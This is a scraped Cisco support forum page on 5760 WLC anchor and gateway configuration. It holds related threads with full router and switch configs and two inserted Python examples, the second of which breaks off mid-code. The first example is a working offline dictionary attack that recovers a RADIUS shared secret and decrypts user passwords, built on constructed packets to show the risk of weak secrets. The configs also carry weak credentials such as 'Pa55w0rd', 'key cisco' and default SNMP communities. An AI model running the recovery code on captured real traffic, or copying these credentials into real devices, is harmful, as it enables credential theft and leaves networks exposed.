Cisco 5760 - Anchor config issue
Hi,
I am having an issue where the 5760 Anchor WLC has 4 subnets, but half of the VLANs need to go to one gateway and the other half to a separate gateway.
The image below shows what the network looks like:
The router (Content Filtering) is the Gateway for 4 x SSID’s/VLANs
The Firewall is the Gateway for the Management VLAN
The issue here is that we have 2 separate Gateways and there is no way to define separate gateways for each VLAN on the 5760 WLC
We have a default IP route 0.0.0.0 0.0.0.0 10.1.1.254 which is pointing to the Firewall. The firewall is not the gateway for the other 4 x SSID/VLANs that exist on the Anchor, so we do not want all traffic going to the Firewall, only management traffic.
Is there a way to set different gateways for different subnets/VLANs on the 5760 WLC, keeping in mind that there is a default route pointing to the Firewall?
Also, does the 5760 WLC act as a Layer 3 device?
Thanks
Case solution:
The Cisco configuration examples below cover the deployment types for the Anchor configuration.
Wireless WebAuth and Guest Anchor Solutions
The following sections show a WebAuthentication (WebAuth) configuration and Guest Anchor examples on the CT5760.
Note: For a complete WebAuth configuration, download the WebAuth bundle from http://software.cisco.com/download/release.html?mdfid=284397235&softwareid=282791507&release=3.2.2&relind=AVAILABLE&rellifecycle=&reltype=latest . The readme file has all the GUI and CLI configuration for WebAuth.
Configure Parameter-Map Section in Global Configuration
The parameter-map connection configuration mode commands allow you to define a connection-type parameter map. After you create the connection parameter map, you can configure TCP, IP, and other settings for the map.
! First section is to define our global values and the internal Virtual Address.
! This should be common across all WCM nodes.
parameter-map type webauth global
virtual-ip ipv4 192.0.2.1
parameter-map type webauth webparalocal
type webauth
banner text ^C WebAuthX ^C
redirect on-success http://9.12.128.50/webauth/loginsuccess.html
redirect portal ipv4 9.12.128.50
Configure Customized WebAuth Tar Packages
Transfer each file to flash:
copy tftp://10.1.10.100/WebAuth/webauth_consent.html flash:webauth_consent.html
copy tftp://10.1.10.100/WebAuth/webauth_success.html flash:webauth_success.html
copy tftp://10.1.10.100/WebAuth/webauth_failure.html flash:webauth_failure.html
copy tftp://10.1.10.100/WebAuth/webauth_expired.html flash:webauth_expired.html
Configure Parameter Map with Custom Pages
parameter-map type webauth webparalocal
type webauth
custom-page login device flash:webauth_consent.html
custom-page success device flash:webauth_success.html
custom-page failure device flash:webauth_failure.html
custom-page login expired device flash:webauth_expired.html
Configure Parameter Map with Type Consent and Email Options
parameter-map type webauth webparalocal
type consent
consent email
custom-page login device flash:webauth_consent.html
custom-page success device flash:webauth_success.html
custom-page failure device flash:webauth_failure.html
custom-page login expired device flash:webauth_expired.html
Configure Local WebAuth Authentication
Prefer the secret keyword over password for the local account, so the credential is stored hashed rather than as a reversible type 7 string.
username guest password guest123
aaa new-model
dot1x system-auth-control
aaa authentication login EXT_AUTH local
aaa authorization network EXT_AUTH local
aaa authorization network default local
or
aaa authentication login default local
aaa authorization network default local
Configure External Radius for WebAuth
aaa new-model
dot1x system-auth-control
aaa server radius dynamic-author
client 10.10.200.60 server-key cisco
auth-type any
radius server cisco
address ipv4 10.10.200.60 auth-port 1812 acct-port 1813
key cisco
aaa group server radius cisco
server name cisco
aaa authentication login EXT_AUTH group cisco
or
aaa authentication login default group cisco
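The RADIUS section above uses `key cisco` as the shared secret. The following added example (not part of the Cisco guide or the thread) shows, following RFC 2865, how the User-Password attribute is hidden with MD5 keystream blocks and how the Response Authenticator is computed, and why a dictionary-word secret can be recovered offline from a single captured Access-Request/Access-Accept pair. Every packet is constructed inside the script, and the function names (`hide_password`, `recover_secret`, `demo`) are this example's own.

```python
"""Added example: RFC 2865 password hiding, Response Authenticator, and an offline
dictionary attack on a weak RADIUS shared secret such as `key cisco`.
All packets are constructed here; nothing is captured from a network."""
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2
HEADER = struct.Struct("!BBH")  # Code, Identifier, Length; the 16-byte Authenticator follows


def attribute(type_code: int, value: bytes) -> bytes:
    """Type-Length-Value encoding; Length includes the two header bytes."""
    return struct.pack("!BB", type_code, len(value) + 2) + value


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16 bytes, c_i = p_i XOR MD5(secret + c_(i-1)), c_0 = Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out, prev = out + block, block
    return out


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: what the server does, and what anyone holding the secret can do."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out, prev = out + bytes(c ^ k for c, k in zip(block, keystream)), block
    return out.rstrip(b"\x00")


def build_access_request(ident: int, username: bytes, password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    attrs = attribute(ATTR_USER_NAME, username) + attribute(
        ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    return HEADER.pack(ACCESS_REQUEST, ident, 20 + len(attrs)) + request_auth + attrs


def response_authenticator(code: int, ident: int, attrs: bytes, request_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(HEADER.pack(code, ident, 20 + len(attrs)) + request_auth + attrs + secret).digest()


def build_access_accept(ident: int, request_auth: bytes, secret: bytes, attrs: bytes = b"") -> bytes:
    return HEADER.pack(ACCESS_ACCEPT, ident, 20 + len(attrs)) + response_authenticator(
        ACCESS_ACCEPT, ident, attrs, request_auth, secret) + attrs


def recover_secret(request: bytes, response: bytes, wordlist):
    """Every input to the Response Authenticator except the secret is on the wire,
    so one captured request/response pair gives an offline check per candidate."""
    request_auth = request[4:20]
    code, ident, length = HEADER.unpack(response[:4])
    attrs = response[20:length]
    for candidate in wordlist:
        if response_authenticator(code, ident, attrs, request_auth, candidate) == response[4:20]:
            return candidate
    return None


def demo(secret: bytes = b"cisco"):
    """Simulate the NAS/server exchange, then attack it as an eavesdropper would."""
    request_auth = os.urandom(16)
    request = build_access_request(7, b"guest", b"guest123", secret, request_auth)
    response = build_access_accept(7, request_auth, secret)
    # Constructed wordlist; a real attack uses a large dictionary plus vendor defaults.
    wordlist = [b"password", b"radius", b"secret", b"cisco", b"admin"]
    return recover_secret(request, response, wordlist)


if __name__ == "__main__":
    print("recovered:", demo())
    print("recovered:", demo(secret=os.urandom(24)))  # a random 24-byte secret is in no wordlist
```

The attack needs nothing but passive capture of the RADIUS exchange between the WLC and the server, which is why the shared secret should be long and random and the RADIUS path should be on a protected management network; once the secret is known, `reveal_password` decrypts every User-Password seen on the wire.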
Configure WLAN with WebAuth
wlan Guest-WbAuth 3 Guest-WbAuth
client vlan 100
mobility anchor 192.168.5.1
no security wpa
no security wpa akm dot1x
no security wpa wpa2
no security wpa wpa2 ciphers aes
security web-auth
security web-auth authentication-list EXT_AUTH
security web-auth parameter-map webparalocal
no shutdown
Configure HTTP Server in Global Configuration
!--- These are needed to enable Web Services in the Cisco IOS® software.
ip http server
ip http secure-server
ip http active-session-modules none
Other Configurations to be Checked or Enabled
!--- These are some global housekeeping Cisco IOS® software commands:
ip device tracking
ip dhcp snooping
SNMP Configuration
From the CT5760 console, configure the SNMP community strings. The defaults shown here (public read-only, private read-write) are the first values any scanner tries; use unique strings and restrict them with an access list.
snmp-server community public ro
snmp-server community private rw
IPv6 Configuration
IPv6 is supported on the data path. Wireless clients will be able to get an IPv6 address.
Enable IPv6 Snooping - CT5760
There are slight differences in configurations on a CT5760 when configuring IPv6. To enable IPv6 on a CT5760, the following step must be completed.
ipv6 nd raguard policy testgaurd
trusted-port
device-role router
interface TenGigabitEthernet1/0/1
description Uplink to Core Switch
switchport trunk native vlan 200
switchport mode trunk
ipv6 nd raguard attach-policy testgaurd
ip dhcp snooping trust
Enable IPv6 on Interface - CT5760
Based on the interfaces that need IPv6 and the type of address needed, the respective configurations are enabled as follows. In this example IPv6 is enabled on the client VLAN, VLAN 100.
vlan configuration 100 200
ipv6 nd suppress
ipv6 snooping
interface Vlan100
description Client VLAN
ip address 10.10.100.5 255.255.255.0
ip helper-address 10.10.100.1
ipv6 address 2001:DB8:0:10::1/64
ipv6 address FEC0:20:21::1/64
ipv6 enable
Similar Messages
-
Cisco 2950 switch config issues
WOOHOO that worked! Have been on another site for a week trying to get this done.
Now, how do I change the default SSH port from 22 to the port I want?
Hello,
I have a Cisco 2950 switch that I am trying to get working correctly. I want to be able to make console and SSH connections, but not Telnet.
en
!
config t
username admin secret Pa55w0rd
enable secret Pa55w0rd
!
line con 0
password Pa55w0rd
login local
!
line vty 0 4
password Pa55w0rd
login local
transport input ssh
!
hostname GEMSWI0001
ip domain-name domain.local
ntp server 192.168.217.10
!
crypto key generate rsa modulus 2048
username admin priv 15 secret Pa55w0rd
aaa new-model
!
service password-encryption
!
ip http server
ip http port 65410
!
!
vlan 128
name Office
int vlan128
ip address 192.168.128.254 255.255.255.0
shut
!
vlan 217
name GEM
int vlan217
ip address 192.168.217.254 255.255.255.0
shut
!
vlan 999
name GEM-Admin
int vlan999
ip address 192.168.255.251 255.255.255.248
no shut
!
int fa0/47
description GEMCON0000-1
switchport access vlan 999
switchport mode access
switchport...
This topic first appeared in the Spiceworks Community -
Cisco 5760 controller in centralized mode supports 4404 controller as anchor controller?
Hello All,
I have a cisco 5760 controller running in centralized mode. I want to configure one 4404 controller as anchor controller to work with the 5760 controller. Is this supported?.
Thanks in advance
Shabeeb
No, it is not supported.
You cannot have a mobility peer with a 5760 unless you enable "new mobility" on its peer. In CUWN products this is supported on 5508/WiSM2/8510 on specific codes. In currently supported codes it has to be 7.6.x or 8.x.
As you know, the 4400 only supported up to 7.0.x code, so new mobility is not supported; hence you cannot peer with CA products.
In case if you have a "new mobility" supported WLC, here how you configure it
http://mrncciew.com/2014/05/06/configuring-new-mobility/
HTH
Rasika
**** Pls rate all useful responses **** -
3850 WLC - 5760 Anchor: Multiple Guest SSIDs issue
Hi,
I have configured a 3850 Foreign WLC and a 5760 as anchor WLC in a DMZ behind an ASA FW. The Anchor Controller is configured to advertise 3 GUEST wireless networks:
(INSIDE) ---- ASA FW (guest in interface) -------------------------- (Te1/0/1) 5760 ANCHOR (Te1/0/2) -------------------- L3 Link-------------------- (guest out interface) ASA FW ---- (OUTSIDE)
GUEST1: 10.9.65.0/24 – VLAN 11
GUEST2: 10.9.66.0/24 – VLAN 12
GUEST3: 10.9.67.0/24 – VLAN 13
Management VLAN 1: 10.8.252.1 (Anchor Management VLAN – Mobility)
The link between the WLC and the Guest OUT Interface on the ASA Firewall is a L3 Link, NOT a Trunk.
The 5760 WLC is also a DHCP server for the three client VLANs above. I have also configured 3 SVIs as default gateways for these VLANs:
Interface vlan 11 – 10.9.65.1
Interface vlan 12 – 10.9.66.1
Interface vlan 13 – 10.9.67.1
wgh-anchorwlc5760-primary#show ip interface brief
Interface IP-Address OK? Method Status Protocol
Vlan1 10.8.252.1 YES NVRAM up up
Vlan11 10.9.65.1 YES manual up up
Vlan12 10.9.66.1 YES manual up up
Vlan13 10.9.67.1 YES manual up up
GigabitEthernet0/0 10.8.252.85 YES NVRAM down down
Te1/0/1 unassigned YES unset up up
Te1/0/2 10.8.253.1 YES NVRAM up up
Capwap0 unassigned YES unset up up
If a client connects to GUEST1 SSID it gets an IP address in VLAN 11 and its default gateway is 10.9.65.1.
If a client connects to GUEST2 SSID it gets an IP address in VLAN 12 and its default gateway is 10.9.66.1.
If a client connects to GUEST3 SSID it gets an IP address in VLAN 13 and its default gateway is 10.9.67.1.
Mobility is UP and I can see clients connected to the Anchor WLC either in IPLEARN or WEBAUTH_PEND state. DHCP is working fine; clients get an IP and the right default gateway and DNS servers when they connect, for example, to GUEST1.
anchorwlc5760-primary#show wireless client summary
Number of Local Clients : 3
MAC Address AP Name WLAN State Protocol
04f7.e482.b21c N/A 2 IPLEARN Mobile
bc3e.6d32.17f6 N/A 2 IPLEARN Mobile
a826.d5b3.5ae8 N/A 2 WEBAUTH_PEND Mobile
However, they are not able to ping the default gateway (SVI VLAN 11: 10.9.65.1), so I cannot see any traffic leaving the Anchor WLC to continue with the Web Authentication process (CWA) using ISE. I can see that the authorization policy ("unknown" and the URL to ISE) has been pushed to the clients, but I am not redirected to the ISE Web Authentication Portal when I open my web browser. I have done some captures on the FW interfaces but I cannot see any traffic coming from the clients.
I know that usually there is a Trunk (that allows client VLANs) between a WLC and an L3 switch when you configure multiple SSIDs and then configure the SVIs on the L3 switch. However, I think this design with an L3 link should work too, because the 5760 is a WLC + L3 switch.
My question is: why are clients not able to ping their default gateway?
I hope it makes sense.
I appreciate any thoughts and help. Thanks in advance.
Joana.
Hi,
I couldn't get it working (I doubt if it is really possible). I had to add a switch between the 5760 Anchor Controller and the ASA Firewall:
(INSIDE) ---- ASA FW (guest in interface) -------------------------- (Te1/0/1) 5760 ANCHOR (Te1/0/2) -------------------- SWITCH-------------------- (guest out interface) ASA FW ---- (OUTSIDE)
The link between the 5760 and the Switch is configured as a Trunk and it allows the 3 Guest SSIDs (VLANs). The link between the Switch and the ASA FW is configured as a Layer 3 link. I also set up the default gateways for the 3 GUEST VLANs in the Switch (3 vlan interfaces) and the 5760 as DHCP Server.
I hope it helps.
Joana. -
Hi,
I am configuring a Cisco 5760 WLC and wondering if it is required to put in a default route. This document says to put one in, but I don't see why it is needed as it is connected to a switch via a Layer 2 trunk.
Reference:
https://supportforums.cisco.com/docs/DOC-34430
Another question: since there are no more Dynamic Interfaces and they are replaced with Layer 2 and Layer 3 interfaces instead, do all Layer 2 interfaces you create require a Layer 3 interface IP address to be configured as well? As shown below:
Thanks
So by default the 5760 has IP routing enabled, so you will need to put in a default route. A default gateway won't work unless you disable IP routing first.
Sent from Cisco Technical Support iPhone App -
Can't delete WLAN, missing anchor config...
Using WLC v7.6.100.0
(Cisco Controller) >config wlan delete <n>
This WLAN is used in AP groups.
Are you sure you want to continue? (y/n) y
Anchors configured on WLAN - unable to delete WLAN entry.
There are no anchors configured on the WLAN... I think this is seen when an IP address changes in the mobility group, but the anchor for a WLAN isn't removed prior to the change. This is an old bug from 4.2
https://tools.cisco.com/bugsearch/bug/CSCsy94911
Anyone got a workaround other than resetting the WLC? That would be very annoying...
Hi Rasika,
Yes, I tried that.
One thing to note is that when you add the problem anchor it no longer appears on the list of selectable anchors but it doesn't appear above in the configured anchors...
I then tried removing all WLAN anchor configs, then changing the mobility group entry for the anchor WLC to the previous (original) IP entry, then adding and removing that.
So I assume that there is hidden WLAN config mapping anchor wlc by MAC to IP... If there is a mobility group change this config goes into limbo.... It's still there but is removed from GUI and console running config somehow
:S -
Cisco 5760 WebAuth "Consent Success Page"
I've downloaded the WebAuth bundle from cisco.com and uploaded to a Cisco 5760 software version 3.6
It is all functioning correctly, except one aspect.
After the user reads the AUP and clicks the submit button they are sent to a "Consent Success Page" that reads "Thanks for Accepting our Consent" and will redirect to the ios configured redirectURL after 5 seconds.
Has anyone come across this? Can anyone advise how I customise this "Consent Success Page"? It doesn't appear to load the success.html page that I've configured below.
parameter-map type webauth global
type webconsent
virtual-ip ipv4 1.1.1.1
max-http-conns 100
intercept-https-enable
parameter-map type webauth PublicWiFi
type consent
consent email
redirect on-success http://bbc.co.uk
custom-page login device flash://consent/pub/consent.html
custom-page success device flash://consent/pub/success.html
custom-page failure device flash://consent/pub/failed.html
custom-page login expired device flash://consent/pub/logout.html
logout-window-disabled
May be the bug CSCup67821 with no workaround
-
Anchor config with 802.1x
I have working guest configuration using an anchor config. I'm trying to do it with a second SSID but the difference is that the second SSID is supposed to use 802.1x.
Now I do see the client associate with the remote site controller using this second SSID, but I don't see anything on the anchor controller. And because of that I don't see that client getting an IP address either. I have the same exact SSID on the anchor controller as well and users are working fine connecting to it in the corporate office.
It doesn't appear that the handoff to the anchor happens; there are a ton of messages about DHCP being dropped due to ongoing mobility handshake:
DHCP Socket Task: Oct 01 15:21:20.141: 3c:ab:8e:67:9f:28 DHCP dropping packet due to ongoing mobility handshake exchange, (siaddr 0.0.0.0, mobility state = 'apfMsMmAnchorExportRequested'
and then the user gets dropped onto the management interface, which I assume is the interface in the WLAN config:
*apfMsConnTask_0: Oct 01 15:16:00.182: 3c:ab:8e:67:9f:28 Applying Local Bridging Interface Policy for station 3c:ab:8e:67:9f:28 - vlan 0, interface id 0, interface 'management'
First, I wouldn't leave an anchored WLAN linked to management, I like to create a dummy interface.
Second, can you post the WLAN configs?
HTH,
Steve -
Hi all,
Hopefully this will be a nice easy one for you all.
I have recently configured and installed an 851 router successfully :) I now only have one issue, the damn thing switches itself off after a period of inactivity!
If I want to use it again I have to issue a reset command then a boot command.
This takes me to the:
router>
prompt. I then have to issue a copy start run command. And then a no shut on each of my interfaces.
Obviously I would just like the router to stay up and running. But I cant work out how to do it. Im sure that this is just a simple config issue and I would dearly love for you all to solve it!
If any of you know the answer, can you please provide clear and accurate commands, as I will copy them parrot fashion into the router.
Thank you all in advance.
Stuart
Hello,
as spremkumar already pointed out, the config register usually is set to 0x2102. You can reconfigure the register by:
Router#configure terminal
Router(config)#config-register 0x2102
Router(config)#end
Then perform a reload and check whether the config is present after the router finished booting.
Hope this helps! Please rate all posts.
Regards, Martin -
CISCO PRIME INFRASTRUCTURE 1.2 CONFIG ISSUE
hello all,
This is my first time running Cisco Prime Infrastructure 1.2, but it seems not to be working properly as I have errors on it.
I had issues from the very beginning and had to write erase the config, but the appliance only boots to a blank screen with a cursor.
Can anyone advise on how to restore it back to initial setup,
and please, what's the effect of the RESET button on the device?
Thanks
I don't know if this has been fixed in 2.0 or not. By the looks of the bug it hasn't. However, there is a workaround:
https://tools.cisco.com/bugsearch/search?kw=prime%20infrastructure%20copy%20run%20start&pf=prdNm&sb=anfr&srtBy=byRel&bt=custV
BugID
CSCuf89957
Prime Infrastructure - No option to save running config to startup
Conditions:
Prime Infrastructure 1.2/1.3
Workaround:
Create a Configuration Template that runs either:
"do write mem"
Or for devices which no longer support "write mem", use:
"file prompt quiet
do copy run start
no file prompt quiet" -
IOS XE Cisco 4431 NAT Config DNS Issues
Hi All,
I found out that IOS XE does not support IP DNS Server and therefore you are required to have a DNS server separately. My question is: if I push all clients to a public DNS server such as Google, why does it not work?
I can ping out and do NSLOOKUPs but nothing resolves in the browser. I have added an inbound rule to the WAN ACL to allow UDP/TCP 53 from 8.8.4.4 and it does not work. I've spent ages and the only thing that does work is IP ANY ANY, and obviously I am not leaving that rule there. Is it a bug?
Thanks
Ben
Hi Collin,
Sorry for the delay, I have left the "IP any any" under WAN ACL 102.
I did try CBAC at the 11th hour but it was spewing up unrecognised remarks and I didn't have time to go through.
Please see the config below for reference; I have put in Google DNS.
Just to be clear No DNS resolves from DHCP clients if i remove the IP any any from WAN ACL102. The router can resolve locally i.e over serial.
Many Thanks
Ben
Bespoke#sh run
Building configuration...
Current configuration : 12805 bytes
! Last configuration change at 18:24:43 GMT Sun Mar 15 2015 by admin
! NVRAM config last updated at 18:24:45 GMT Sun Mar 15 2015 by admin
version 15.4
no service pad
service tcp-keepalives-in
service tcp-keepalives-out
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
no platform punt-keepalive disable-kernel-core
hostname Bespoke
boot-start-marker
boot system flash bootflash:isr4400-universalk9.03.13.02.S.154-3.S2-ext.SPA.bin
boot-end-marker
vrf definition Mgmt-intf
address-family ipv4
exit-address-family
address-family ipv6
exit-address-family
logging buffered 16386 informational
logging rate-limit 100 except warnings
no logging console
aaa new-model
aaa authentication fail-message ^CCCC Login failed.
This could be because your RADIUS credentials are incorrect, or the RADIUS servers are unreachable. If servers are unreachable, use a local username and password.^C
aaa authentication login default group radius local enable
aaa authentication enable default group radius enable
aaa authorization console
aaa authorization exec default group radius local
aaa session-id common
clock timezone GMT 0 0
clock summer-time BST recurring last Sun Mar 1:00 last Sun Oct 2:00
no ip source-route
ip options drop
no ip bootp server
ip domain name x.net
ip name-server x.x.x.x
ip name-server x.x.x.x
ip dhcp bootp ignore
no ip dhcp conflict logging
ip dhcp excluded-address 192.168.1.1 192.168.1.15
ip dhcp excluded-address 10.10.10.1
ip dhcp excluded-address 172.1.0.1
ip dhcp excluded-address 172.1.1.1
ip dhcp excluded-address 172.1.2.1
ip dhcp excluded-address 172.1.3.1
ip dhcp pool ManagementVLAN100
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
dns-server 8.8.4.4
ip dhcp pool VLAN200
network 10.10.8.0 255.255.252.0
default-router 10.10.10.1
dns-server 8.8.4.4
lease 0 1
ip dhcp pool VLAN300
network 172.1.0.0 255.255.255.0
default-router 172.1.0.1
dns-server 8.8.4.4
ip dhcp pool VLAN400
network 172.1.1.0 255.255.255.0
default-router 172.1.1.1
dns-server 8.8.4.4
ip dhcp pool VLAN500
network 172.1.2.0 255.255.255.0
default-router 172.1.2.1
dns-server 8.8.4.4
ip dhcp pool VLAN600
network 172.1.3.0 255.255.255.0
default-router 172.1.3.1
dns-server 8.8.4.4
subscriber templating
multilink bundle-name authenticated
redundancy
mode none
no cdp run
ip ssh time-out 60
ip ssh authentication-retries 2
ip ssh version 2
class-map match-all 140mbpsratelimit
match access-group 103
policy-map 140mbpsratelimit
class 140mbpsratelimit
police cir 146800500 bc 27525120 be 55050240
conform-action transmit
exceed-action drop
violate-action drop
interface Null0
no ip unreachables
interface GigabitEthernet0/0/0
no ip address
negotiation auto
interface GigabitEthernet0/0/0.602
description PRIMARYWAN200MBPS
encapsulation dot1Q 602
ip address x.x.x.x 255.255.255.252
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat outside
ip verify unicast source reachable-via rx allow-default
ip access-group 102 in
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1
no ip address
negotiation auto
interface GigabitEthernet0/0/1.100
description ManagementVLAN100
encapsulation dot1Q 100
ip address 192.168.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.200
encapsulation dot1Q 200
ip address 10.10.10.1 255.255.252.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
service-policy input 140mbpsratelimit
service-policy output 140mbpsratelimit
ip virtual-reassembly
interface GigabitEthernet0/0/1.300
encapsulation dot1Q 300
ip address 172.1.0.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.400
encapsulation dot1Q 400
ip address 172.1.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.500
encapsulation dot1Q 500
ip address 172.1.2.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/1.600
encapsulation dot1Q 600
ip address 172.1.3.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat inside
no cdp enable
ip virtual-reassembly
interface GigabitEthernet0/0/2
no ip address
negotiation auto
interface GigabitEthernet0/0/2.603
interface GigabitEthernet0/0/3
no ip address
shutdown
negotiation auto
interface GigabitEthernet0
vrf forwarding Mgmt-intf
no ip address
shutdown
negotiation auto
ip nat inside source list 1 interface GigabitEthernet0/0/0.602 overload
ip nat inside source static tcp 192.168.1.15 443 x.x.x.x 443 extendable
no ip forward-protocol nd
no ip forward-protocol udp
no ip http server
no ip http secure-server
ip route 0.0.0.0 0.0.0.0 x.x.x.x
ip route 0.0.0.0 255.0.0.0 Null0
ip route 10.0.0.0 255.0.0.0 Null0
ip route 127.0.0.0 255.0.0.0 Null0
ip route 169.254.0.0 255.255.0.0 Null0
ip route 172.16.0.0 255.240.0.0 Null0
ip route 192.0.0.0 255.255.255.0 Null0
ip route 192.0.2.0 255.255.255.0 Null0
ip route 192.168.0.0 255.255.0.0 Null0
ip route 198.18.0.0 255.254.0.0 Null0
ip route 198.51.100.0 255.255.255.0 Null0
ip route 203.0.113.0 255.255.255.0 Null0
ip radius source-interface GigabitEthernet0/0/0.602
access-list 1 remark NAT-LAN
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 1 permit 10.10.8.0 0.0.3.255
access-list 1 permit 172.1.0.0 0.0.0.255
access-list 1 permit 172.1.1.0 0.0.0.255
access-list 1 permit 172.1.2.0 0.0.0.255
access-list 1 permit 172.1.3.0 0.0.0.255
access-list 50 remark SNMP_ACCESS
access-list 50 permit x.x.x.x 0.0.0.31
access-list 50 permit x.x.x.x 0.0.0.31
access-list 51 remark NTP_ACCESS
access-list 51 permit x.x.x.x
access-list 51 permit x.x.x.x
access-list 51 deny any
access-list 51 remark NTP_ACCESS
access-list 102 remark WAN_INGRESSPrimary
access-list 102 permit ip any any
access-list 102 permit tcp any host x.x.x.x eq 443
access-list 102 permit udp host 8.8.4.4 eq domain host x.x.x.x
access-list 102 permit udp host 8.8.8.8 eq domain host x.x.x.x
access-list 102 permit udp host x.x.x.x eq ntp host x.x.x.x eq ntp
access-list 102 permit udp host x.x.x.x eq ntp host x.x.x.x eq ntp
access-list 102 permit udp host x.x.x.x eq 1645 host x.x.x.x eq 1645
access-list 102 permit udp host x.x.x.x eq 1645 host x.x.x.x eq 1645
access-list 102 permit udp x.x.x.x 0.0.0.31 host x.x.x.x eq snmp
access-list 102 permit udp x.x.x.x 0.0.0.31 host x.x.x.x eq snmp
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq telnet
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq 22
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq telnet
access-list 102 permit tcp x.x.x.x 0.0.0.31 host x.x.x.x eq 22
access-list 102 permit icmp x.x.x.x 0.0.0.31 any echo
access-list 102 permit icmp x.x.x.x 0.0.0.31 any echo
access-list 102 permit icmp any any echo-reply
access-list 102 permit icmp any any time-exceeded
access-list 102 permit icmp any any unreachable
access-list 102 deny icmp any any
access-list 102 deny ip host 0.0.0.0 any
access-list 102 deny ip host 255.255.255.255 any
access-list 102 deny ip any any
access-list 103 remark 140mbpsratelimit
access-list 103 permit udp any any
access-list 103 permit tcp any any
access-list 150 remark VTY_ACCESS
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq telnet
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq 22
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq telnet
access-list 150 permit tcp x.x.x.x 0.0.0.31 any eq 22
access-list 150 deny ip any any
snmp-server community x.x.x.x RO 50
radius server RadiusPR
address ipv4 x.x.x.x auth-port 1645 acct-port 1646
timeout 3
radius server RadiusTC
address ipv4 x.x.x.x auth-port 1645 acct-port 1646
timeout 3
control-plane
line con 0
logging synchronous
transport output none
stopbits 1
line aux 0
exec-timeout 0 1
no exec
transport output none
stopbits 1
line vty 0 4
access-class 150 in
logging synchronous
transport input telnet ssh
transport output none
line vty 5 15
access-class 150 in
logging synchronous
transport input telnet ssh
ntp access-group peer 51
ntp server x.x.x.x
ntp server x.x.x.x
end -
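In the config posted above, ACL 102 begins with `permit ip any any`, so every line after it can never match, and the only DNS return lines it carries are UDP. The following added example (not from the thread) is a Python first-match evaluator with a shadowed-line check for IOS numbered extended ACLs. The ACL text is a constructed copy of the posted structure with 203.0.113.10 standing in for the masked public address, and it models ACL semantics only: NAT order of operations, CBAC/ZBF inspection and the router's self-originated traffic are outside this model. Names such as `evaluate`, `shadowed` and `without_line` are this example's own.

```python
"""Added example: first-match evaluation and shadowed-line detection for IOS
numbered extended ACLs, modelled on the posted ACL 102 (constructed data)."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

MASK = 0xFFFFFFFF
PORT_NAMES = {"domain": 53, "ntp": 123, "snmp": 161, "telnet": 23}
Match = Optional[Union[int, str]]  # L4 port for tcp/udp, ICMP type keyword for icmp, None = any

# Constructed ACL mirroring the posted structure; 203.0.113.10 replaces the masked x.x.x.x.
SAMPLE_ACL = """
access-list 102 remark WAN_INGRESSPrimary
access-list 102 permit ip any any
access-list 102 permit tcp any host 203.0.113.10 eq 443
access-list 102 permit udp host 8.8.4.4 eq domain host 203.0.113.10
access-list 102 permit udp host 8.8.8.8 eq domain host 203.0.113.10
access-list 102 permit icmp any any echo-reply
access-list 102 permit icmp any any time-exceeded
access-list 102 permit icmp any any unreachable
access-list 102 deny icmp any any
access-list 102 deny ip any any
"""


@dataclass(frozen=True)
class Rule:
    line: int
    action: str
    proto: str
    src: Tuple[int, int]  # (address, wildcard) as on IOS: wildcard bit 1 = don't care
    sport: Match
    dst: Tuple[int, int]
    dport: Match


def _ip(text: str) -> int:
    return int(ipaddress.IPv4Address(text))


def _parse_endpoint(tokens, i):
    """Parse `any` | `host A.B.C.D` | `A.B.C.D WILDCARD`, then an optional `eq PORT`."""
    if tokens[i] == "any":
        spec, i = (0, MASK), i + 1
    elif tokens[i] == "host":
        spec, i = (_ip(tokens[i + 1]), 0), i + 2
    else:
        spec, i = (_ip(tokens[i]), _ip(tokens[i + 1])), i + 2
    port = None
    if i < len(tokens) and tokens[i] == "eq":
        port = PORT_NAMES.get(tokens[i + 1]) or int(tokens[i + 1])
        i += 2
    return spec, port, i


def parse_acl(text: str, number: int) -> List[Rule]:
    rules = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        t = line.split()
        if len(t) < 5 or t[:2] != ["access-list", str(number)] or t[2] == "remark":
            continue
        src, sport, i = _parse_endpoint(t, 4)
        dst, dport, i = _parse_endpoint(t, i)
        if t[3] == "icmp" and i < len(t):
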